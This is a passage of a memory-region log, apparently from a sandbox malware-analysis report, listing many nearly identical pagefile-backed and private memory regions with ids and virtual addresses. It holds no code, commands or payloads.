pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9311 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9312 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9313 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9314 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9315 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9316 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9317 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9318 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9319 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9320 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9321 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9322 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9323 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9324 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9325 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9326 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9327 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9328 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9329 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9330 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9331 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9332 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9333 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9334 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9335 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9336 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9337 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9338 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9339 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9340 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9341 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9342 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9343 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9344 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9345 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9346 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9347 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9348 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9349 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9350 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9351 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9352 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9353 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9354 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9355 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9356 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9357 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9358 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9359 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9360 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9361 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9362 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9363 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9364 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9365 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9366 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9367 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9368 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9369 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9370 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9371 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9372 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9373 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9374 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9375 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9376 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9377 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9378 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9379 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9380 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9381 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9382 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9383 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9384 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9385 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9386 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9387 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9388 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9389 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9390 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9391 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9392 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9393 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9394 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9395 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9396 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9397 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9398 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9399 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9400 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9401 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9402 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9403 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9404 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9405 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9406 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9407 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9408 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9409 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9410 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9411 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9412 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9413 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9414 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9415 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9416 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9417 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9418 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9419 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9420 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9421 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9422 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9423 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9424 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9425 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9426 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9427 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9428 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9429 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9430 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9431 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9432 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9497 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 9498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 